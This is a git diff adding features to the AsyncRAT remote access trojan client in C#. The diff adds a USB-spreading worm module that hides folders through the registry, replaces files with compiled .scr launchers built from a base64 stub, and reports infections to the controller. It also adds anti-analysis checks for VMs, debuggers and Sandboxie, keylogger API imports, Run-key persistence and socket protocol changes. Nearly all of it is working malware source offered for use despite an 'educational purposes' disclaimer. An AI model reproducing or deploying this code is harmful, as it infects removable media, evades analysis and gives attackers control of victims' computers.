+
+ private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
+
+ [DllImport("user32.dll")]
+ static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int count);
+ [DllImport("user32.dll")]
+ static extern IntPtr GetForegroundWindow();
+ private static string CurrentActiveWindowTitle;
+
+ [DllImport("user32.dll", SetLastError = true)]
+ static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
+
+ [DllImport("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true, CallingConvention = CallingConvention.Winapi)]
+ public static extern short GetKeyState(int keyCode);
+
+ [DllImport("user32.dll", SetLastError = true)]
+ [return: MarshalAs(UnmanagedType.Bool)]
+ static extern bool GetKeyboardState(byte[] lpKeyState);
+ [DllImport("user32.dll")]
+ static extern IntPtr GetKeyboardLayout(uint idThread);
+ [DllImport("user32.dll")]
+ static extern int ToUnicodeEx(uint wVirtKey, uint wScanCode, byte[] lpKeyState, [Out, MarshalAs(UnmanagedType.LPWStr)] StringBuilder pwszBuff, int cchBuff, uint wFlags, IntPtr dwhkl);
+ [DllImport("user32.dll")]
+ static extern uint MapVirtualKey(uint uCode, uint uMapType);
+
+ #endregion
+
+ }
+}
diff --git a/AsyncRAT-C#/Client/Handle Packet/LimeUSB.cs b/AsyncRAT-C#/Client/Handle Packet/LimeUSB.cs
new file mode 100644
index 0000000..058cd06
--- /dev/null
+++ b/AsyncRAT-C#/Client/Handle Packet/LimeUSB.cs
@@ -0,0 +1,222 @@
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Text;
+using System.Drawing.IconLib; // AsyncRAT-C#\packages\IconLib
+using Microsoft.Win32;
+using System.Drawing;
+using Microsoft.CSharp;
+using System.CodeDom.Compiler;
+using Client.MessagePack;
+using Client.Sockets;
+using System.Threading;
+using System.Windows.Forms;
+//
+// │ Author : NYAN CAT
+// │ Name : LimeUSB v0.3
+
+// Contact Me : https://github.com/NYAN-x-CAT
+// This program Is distributed for educational purposes only.
+//
+
+namespace Client.Handle_Packet
+{
+ class LimeUSB
+ {
+ public void Run()
+ {
+ Initialize();
+ }
+
+ private void Initialize()
+ {
+ ExplorerOptions();
+ int count = 0;
+ foreach (DriveInfo USB in DriveInfo.GetDrives())
+ {
+ try
+ {
+ if (USB.DriveType == DriveType.Removable && USB.IsReady)
+ {
+ count += 1;
+ if (!Directory.Exists(USB.RootDirectory.ToString() + spreadSettings.WorkDirectory))
+ {
+ Directory.CreateDirectory(USB.RootDirectory.ToString() + spreadSettings.WorkDirectory);
+ File.SetAttributes(USB.RootDirectory.ToString() + spreadSettings.WorkDirectory, FileAttributes.System | FileAttributes.Hidden);
+ }
+
+ if (!Directory.Exists((USB.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory)))
+ Directory.CreateDirectory((USB.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory));
+
+ if (!File.Exists(USB.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile))
+ File.Copy(Application.ExecutablePath, USB.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile);
+
+ CreteDirectory(USB.RootDirectory.ToString());
+
+ InfectFiles(USB.RootDirectory.ToString());
+ }
+ }
+ catch (Exception ex)
+ {
+ Debug.WriteLine("Initialize " + ex.Message);
+ }
+ }
+ if (count != 0)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "usbSpread";
+ msgpack.ForcePathObject("Count").AsString = count.ToString();
+ ClientSocket.BeginSend(msgpack.Encode2Bytes());
+ }
+
+ }
+
+ private void ExplorerOptions()
+ {
+ try
+ {
+ RegistryKey Key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", true);
+ if (Key.GetValue("Hidden") != (object)2)
+ Key.SetValue("Hidden", 2);
+ if (Key.GetValue("HideFileExt") != (object)1)
+ Key.SetValue("HideFileExt", 1);
+ }
+ catch { }
+ }
+
+ private void InfectFiles(string Path)
+ {
+ foreach (var file in Directory.GetFiles(Path))
+ {
+ try
+ {
+ if (CheckIfInfected(file))
+ {
+ ChangeIcon(file);
+ File.Move(file, file.Insert(3, spreadSettings.WorkDirectory + "\\"));
+ CompileFile(file);
+ }
+ }
+ catch { }
+ }
+
+ foreach (var directory in Directory.GetDirectories(Path))
+ {
+ if (!directory.Contains(spreadSettings.WorkDirectory))
+ InfectFiles(directory);
+ }
+ }
+
+ private void CreteDirectory(string USB_Directory)
+ {
+ foreach (var directory in Directory.GetDirectories(USB_Directory))
+ {
+ try
+ {
+ if (!directory.Contains(spreadSettings.WorkDirectory))
+ {
+ if (!Directory.Exists(directory.Insert(3, spreadSettings.WorkDirectory + "\\")))
+ Directory.CreateDirectory(directory.Insert(3, spreadSettings.WorkDirectory + "\\"));
+ CreteDirectory(directory);
+ }
+ }
+ catch { }
+ }
+ }
+
+ private bool CheckIfInfected(string file)
+ {
+ try
+ {
+ FileVersionInfo info = FileVersionInfo.GetVersionInfo(file);
+ if (info.LegalTrademarks == spreadSettings.InfectedTrademark)
+ return false;
+ else
+ return true;
+ }
+ catch
+ {
+ return false;
+ }
+ }
+
+ private void ChangeIcon(string file)
+ {
+ try
+ {
+ Icon FileIcon = Icon.ExtractAssociatedIcon(file);
+ MultiIcon MultiIcon = new MultiIcon();
+ SingleIcon SingleIcon = MultiIcon.Add(Path.GetFileName(file));
+ SingleIcon.CreateFrom(FileIcon.ToBitmap(), IconOutputFormat.Vista);
+ SingleIcon.Save(Path.GetPathRoot(file) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(file.Replace(" ", null)) + ".ico");
+ }
+ catch { }
+ }
+
+ private void CompileFile(string InfectedFile)
+ {
+ try
+ {
+ string Source = Encoding.UTF8.GetString(Convert.FromBase64String("dXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7CnVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpbYXNzZW1ibHk6IEFzc2VtYmx5VHJhZGVtYXJrKCIlTGltZSUiKV0KW2Fzc2VtYmx5OiBHdWlkKCIlR3VpZCUiKV0KCnN0YXRpYyBjbGFzcyBMaW1lVVNCTW9kdWxlCnsKICAgIHB1YmxpYyBzdGF0aWMgdm9pZCBNYWluKCkKICAgIHsKICAgICAgICB0cnkKICAgICAgICB7CiAgICAgICAgICAgIFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLlN0YXJ0KEAiJUZpbGUlIik7CiAgICAgICAgICAgIFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLlN0YXJ0KEAiJVBheWxvYWQlIik7CiAgICAgICAgfQogICAgICAgIGNhdGNoIHsgfQogICAgfQp9"));
+ Source = Source.Replace("%Payload%", Path.GetPathRoot(InfectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile);
+ Source = Source.Replace("%File%", InfectedFile.Insert(3, spreadSettings.WorkDirectory + "\\"));
+ Source = Source.Replace("%Lime%", spreadSettings.InfectedTrademark);
+ Source = Source.Replace("%LimeUSBModule%", Randomz(new Random().Next(6, 12)));
+ Source = Source.Replace("%Guid%", Guid.NewGuid().ToString());
+
+ CompilerParameters CParams = new CompilerParameters();
+ Dictionary ProviderOptions = new Dictionary();
+ ProviderOptions.Add("CompilerVersion", GetOS());
+
+ string options = "/target:winexe /platform:x86 /optimize+";
+ if (File.Exists(Path.GetPathRoot(InfectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(InfectedFile.Replace(" ", null)) + ".ico"))
+ options += " /win32icon:\"" + Path.GetPathRoot(InfectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(InfectedFile.Replace(" ", null)) + ".ico" + "\"";
+ CParams.GenerateExecutable = true;
+ CParams.OutputAssembly = InfectedFile + ".scr";
+ CParams.CompilerOptions = options;
+ CParams.TreatWarningsAsErrors = false;
+ CParams.IncludeDebugInformation = false;
+ CParams.ReferencedAssemblies.Add("System.dll");
+
+ CompilerResults Results = new CSharpCodeProvider(ProviderOptions).CompileAssemblyFromSource(CParams, Source);
+ }
+ catch (Exception ex)
+ {
+ Debug.WriteLine("CompileFile " + ex.Message);
+ }
+ }
+
+ private string GetOS()
+ {
+ var OS = new Microsoft.VisualBasic.Devices.ComputerInfo();
+ if (OS.OSFullName.Contains("7"))
+ return "v2.0";
+ else
+ return "v4.0";
+ }
+
+ private string Randomz(int L)
+ {
+ string validchars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
+ StringBuilder sb = new StringBuilder();
+ Random rand = new Random();
+ for (int i = 1; i <= L; i++)
+ {
+ int idx = rand.Next(0, validchars.Length);
+ char randomChar = validchars[idx];
+ sb.Append(randomChar);
+ }
+ var randomString = sb.ToString();
+ return randomString;
+ }
+ }
+
+ public class spreadSettings
+ {
+ public static readonly string InfectedTrademark = "Trademark - Lime";
+ public static readonly string WorkDirectory = "$LimeUSB";
+ public static readonly string LimeUSBFile = Path.GetFileName(Application.ExecutablePath);
+ public static readonly string IconsDirectory = "$LimeIcons";
+ }
+}
diff --git a/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs b/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
new file mode 100644
index 0000000..a3a1fd6
--- /dev/null
+++ b/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
@@ -0,0 +1,67 @@
+using System;
+using System.Diagnostics;
+using System.Management;
+using System.Runtime.InteropServices;
+
+// │ Author : NYAN CAT
+// │ Name : Anti Analysis v0.2
+// │ Contact : https://github.com/NYAN-x-CAT
+
+// This program is distributed for educational purposes only.
+
+
+
+namespace Client.Helper
+{
+ class Anti_Analysis
+ {
+ public static void RunAntiAnalysis()
+ {
+ if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie())
+ Environment.FailFast(null);
+ }
+
+ private static bool DetectVirtualMachine()
+ {
+ using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
+ {
+ using (var items = searcher.Get())
+ {
+ foreach (var item in items)
+ {
+ string manufacturer = item["Manufacturer"].ToString().ToLower();
+ if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL"))
+ || manufacturer.Contains("vmware")
+ || item["Model"].ToString() == "VirtualBox")
+ {
+ return true;
+ }
+ }
+ }
+ }
+ return false;
+ }
+
+ private static bool DetectDebugger()
+ {
+ bool isDebuggerPresent = false;
+ CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent);
+ return isDebuggerPresent;
+ }
+
+ private static bool DetectSandboxie()
+ {
+ if (GetModuleHandle("SbieDll.dll").ToInt32() != 0)
+ return true;
+ else
+ return false;
+ }
+
+
+ [DllImport("kernel32.dll")]
+ public static extern IntPtr GetModuleHandle(string lpModuleName);
+
+ [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
+ static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
+ }
+}
diff --git a/AsyncRAT-C#/Client/Helper/Methods.cs b/AsyncRAT-C#/Client/Helper/Methods.cs
index c1619b6..f166be1 100644
--- a/AsyncRAT-C#/Client/Helper/Methods.cs
+++ b/AsyncRAT-C#/Client/Helper/Methods.cs
@@ -1,6 +1,7 @@
using System;
using System.Security.Cryptography;
using System.Text;
+using System.Threading;
namespace Client.Helper
{
@@ -26,5 +27,21 @@ namespace Client.Helper
strResult.Append(b.ToString("x2"));
return strResult.ToString().Substring(0, 12).ToUpper();
}
+
+ private static Mutex _appMutex;
+ public static bool CreateMutex()
+ {
+ bool createdNew;
+ _appMutex = new Mutex(false, Settings.MTX, out createdNew);
+ return createdNew;
+ }
+ public static void CloseMutex()
+ {
+ if (_appMutex != null)
+ {
+ _appMutex.Close();
+ _appMutex = null;
+ }
+ }
}
}
diff --git a/AsyncRAT-C#/Client/Install/NormalStartup.cs b/AsyncRAT-C#/Client/Install/NormalStartup.cs
index c12c746..b2233b0 100644
--- a/AsyncRAT-C#/Client/Install/NormalStartup.cs
+++ b/AsyncRAT-C#/Client/Install/NormalStartup.cs
@@ -1,4 +1,5 @@
-using Microsoft.Win32;
+using Client.Helper;
+using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
@@ -36,6 +37,7 @@ namespace Client.Install
Drop.Dispose();
Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").SetValue(Path.GetFileName(Settings.ClientFullPath), Settings.ClientFullPath);
+ Methods.CloseMutex();
Process.Start(Settings.ClientFullPath);
Environment.Exit(0);
}
diff --git a/AsyncRAT-C#/Client/Program.cs b/AsyncRAT-C#/Client/Program.cs
index da40c54..94f5fbb 100644
--- a/AsyncRAT-C#/Client/Program.cs
+++ b/AsyncRAT-C#/Client/Program.cs
@@ -2,6 +2,7 @@
using Client.Sockets;
using Client.Install;
using System;
+using Client.Helper;
// │ Author : NYAN CAT
// │ Name : AsyncRAT // Simple Socket
@@ -19,6 +20,13 @@ namespace Client
static void Main()
{
+ Thread.Sleep(2500);
+ if (!Methods.CreateMutex())
+ Environment.Exit(0);
+
+ if (Convert.ToBoolean(Settings.Anti))
+ Anti_Analysis.RunAntiAnalysis();
+
if (Convert.ToBoolean(Settings.Install))
NormalStartup.Install();
@@ -28,7 +36,7 @@ namespace Client
{
if (ClientSocket.Connected == false)
ClientSocket.Reconnect();
- Thread.Sleep(2500);
+ Thread.Sleep(1500);
}
}
}
diff --git a/AsyncRAT-C#/Client/Settings.cs b/AsyncRAT-C#/Client/Settings.cs
index 5c60f62..efca5d4 100644
--- a/AsyncRAT-C#/Client/Settings.cs
+++ b/AsyncRAT-C#/Client/Settings.cs
@@ -1,18 +1,19 @@
using Client.Cryptography;
using System;
-using System.Collections.Generic;
using System.IO;
namespace Client
{
- class Settings
+ public static class Settings
{
- public static readonly string Ports = "6606" ;
- public static readonly string Host = "127.0.0.1" ;
- public static readonly string Version = "AsyncRAT 0.3.0";
+ public static readonly string Ports = "6606";
+ public static readonly string Host = "127.0.0.1";
+ public static readonly string Version = "AsyncRAT 0.4";
public static readonly string Install = "false";
public static readonly string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe");
public static string Password = "NYAN CAT";
public static readonly Aes256 aes256 = new Aes256(Password);
+ public static readonly string MTX = "%MTX%";
+ public static readonly string Anti = "%Anti%";
}
}
diff --git a/AsyncRAT-C#/Client/Sockets/ClientSocket.cs b/AsyncRAT-C#/Client/Sockets/ClientSocket.cs
index fdffdeb..7879ad5 100644
--- a/AsyncRAT-C#/Client/Sockets/ClientSocket.cs
+++ b/AsyncRAT-C#/Client/Sockets/ClientSocket.cs
@@ -4,9 +4,7 @@ using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
-using System.Text;
using System.Threading;
-using System.Security.Cryptography;
using Client.Handle_Packet;
using Client.Helper;
@@ -41,7 +39,7 @@ namespace Client.Sockets
Convert.ToInt32(Settings.Ports.Split(',')[new Random().Next(Settings.Ports.Split(',').Length)]));
Debug.WriteLine("Connected!");
Connected = true;
- Buffer = new byte[1];
+ Buffer = new byte[4];
Buffersize = 0;
BufferRecevied = false;
MS = new MemoryStream();
@@ -101,9 +99,11 @@ namespace Client.Sockets
if (Recevied > 0)
{
if (BufferRecevied == false)
- if (Buffer[0] == 0)
+ {
+ MS.Write(Buffer, 0, Recevied);
+ if (MS.Length == 4)
{
- Buffersize = Convert.ToInt64(Encoding.UTF8.GetString(MS.ToArray()));
+ Buffersize = BitConverter.ToInt32(MS.ToArray(), 0);
Debug.WriteLine("/// Client Buffersize " + Buffersize.ToString() + " Bytes ///");
MS.Dispose();
MS = new MemoryStream();
@@ -114,14 +114,18 @@ namespace Client.Sockets
}
}
else
- MS.Write(Buffer, 0, Buffer.Length);
+ {
+ Connected = false;
+ return;
+ }
+ }
else
{
MS.Write(Buffer, 0, Recevied);
if (MS.Length == Buffersize)
{
ThreadPool.QueueUserWorkItem(HandlePacket.Read, Settings.aes256.Decrypt(MS.ToArray()));
- Buffer = new byte[1];
+ Buffer = new byte[4];
Buffersize = 0;
MS.Dispose();
MS = new MemoryStream();
@@ -152,7 +156,7 @@ namespace Client.Sockets
try
{
byte[] buffer = Settings.aes256.Encrypt(Msg);
- byte[] buffersize = Encoding.UTF8.GetBytes(buffer.Length.ToString() + (char)0);
+ byte[] buffersize = BitConverter.GetBytes(buffer.Length);
Client.Poll(-1, SelectMode.SelectWrite);
Client.BeginSend(buffersize, 0, buffersize.Length, SocketFlags.None, EndSend, null);
diff --git a/AsyncRAT-C#/Client/packages.config b/AsyncRAT-C#/Client/packages.config
new file mode 100644
index 0000000..c2d5114
--- /dev/null
+++ b/AsyncRAT-C#/Client/packages.config
@@ -0,0 +1,5 @@
+
+
+
+
+
\ No newline at end of file
diff --git a/README.md b/README.md
index 6a0a233..938a2cc 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,4 @@
-
+
# AsyncRAT